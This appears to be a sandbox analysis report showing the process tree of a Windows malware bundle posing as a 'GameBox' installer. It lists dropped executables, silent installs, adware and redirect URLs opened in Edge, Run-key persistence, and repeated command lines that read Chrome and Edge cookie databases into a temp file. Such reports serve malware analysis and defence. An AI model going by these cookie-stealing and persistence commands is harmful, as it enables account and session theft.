  - Suspicious use of SetWindowsHookEx
  "C:\Users\Admin\AppData\Local\Temp\is-MTJJ2.tmp\X6pFteX1hujq71gAoddJIl03.tmp" /SL5="$202DC,138429,56832,C:\Users\Admin\Documents\X6pFteX1hujq71gAoddJIl03.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    "C:\Users\Admin\AppData\Local\Temp\is-AA40I.tmp\Setup.exe" /Verysilent
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious use of SetWindowsHookEx
      "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
      "C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"
        - Executes dropped EXE
        "C:\Users\Admin\AppData\Roaming\1478644.exe"
          - Checks processor information in registry
          - Enumerates system info in registry
          C:\Windows\system32\WerFault.exe -u -p 4780 -s 2356
            - Program crash
            - Checks processor information in registry
            - Enumerates system info in registry
        "C:\Users\Admin\AppData\Roaming\5605215.exe"
          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        "C:\Users\Admin\AppData\Roaming\3153485.exe"
        "C:\Users\Admin\AppData\Roaming\4881157.exe"
          C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 2548
            - Program crash
            - Checks processor information in registry
            - Enumerates system info in registry
      "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Drops file in Program Files directory
      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        "C:\Users\Admin\AppData\Local\Temp\is-MMVMB.tmp\MediaBurner2.tmp" /SL5="$3028C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of SetWindowsHookEx
          "C:\Users\Admin\AppData\Local\Temp\is-V7FOR.tmp\3377047_logo_media.exe" /S /UID=burnerch2
            "C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe" /VERYSILENT
              - Suspicious use of SetWindowsHookEx
              "C:\Users\Admin\AppData\Local\Temp\is-RJ7JP.tmp\ultramediaburner.tmp" /SL5="$800AE,281924,62464,C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe" /VERYSILENT
                - Executes dropped EXE
                - Adds Run key to start application
                - Drops file in Program Files directory
                - Suspicious use of FindShellTrayWindow
                - Suspicious use of SetWindowsHookEx
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
            "C:\Users\Admin\AppData\Local\Temp\d2-de3b3-031-63687-a6b269a3643ce\Lishacidege.exe"
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
                  - Executes dropped EXE
                  - Suspicious use of SetWindowsHookEx
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
C:\Users\Admin\AppData\Local\Temp\4d-76cb9-41c-d54a6-3a241b7d81929\Xuvylitadae.exe"C:\Users\Admin\AppData\Local\Temp\4d-76cb9-41c-d54a6-3a241b7d81929\Xuvylitadae.exe"9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exeC:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ymcl0sd4.nao\ufgaa.exe & exit10⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ymcl0sd4.nao\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\ymcl0sd4.nao\ufgaa.exe11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exeC:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe"C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe" -q12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 139213⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exe (depth 13)
    C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 1368
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe (depth 13)
    C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 1376
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe (depth 6)
    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe (depth 7)
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe (depth 6)
    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe (depth 7)
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe (depth 6)
    "C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=715
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe (depth 7)
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe (depth 6)
    "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exe (depth 7)
    C:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 1908
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe (depth 6)
    "C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe (depth 7)
    "C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe (depth 2)
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\sihclient.exe (depth 1)
    C:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.2
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rUNdlL32.eXe (depth 1)
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
    C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 452
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1096 -ip 1096
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exe (depth 1)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4504 -ip 4504
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exe (depth 1)
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5556 -ip 5556
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5276 -ip 5276
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5288 -ip 5288
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5340 -ip 5340
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5592 -ip 5592
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5192 -ip 5192
-
C:\Windows\system32\rundll32.exe (depth 1)
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
    C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 448
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2000 -ip 2000
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exe (depth 1)
    C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
    C:\Windows\syswow64\MsiExec.exe -Embedding 746450773384A016A2AFC0A8030AEDA5 C
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
    C:\Windows\syswow64\MsiExec.exe -Embedding EED348EC35EAE2F5393D136883315BB8 C
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
    C:\Windows\syswow64\MsiExec.exe -Embedding 1F4A76F4E90F1B5C39492027BD6B7113 C
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
    C:\Windows\syswow64\MsiExec.exe -Embedding 3AD28EA06C7BA358D002BA422BE6650A
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
    C:\Windows\syswow64\MsiExec.exe -Embedding F1A54687B998F4DB192D8541B949025D C
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe (depth 2)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe (depth 3)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 4)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--PH33"
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
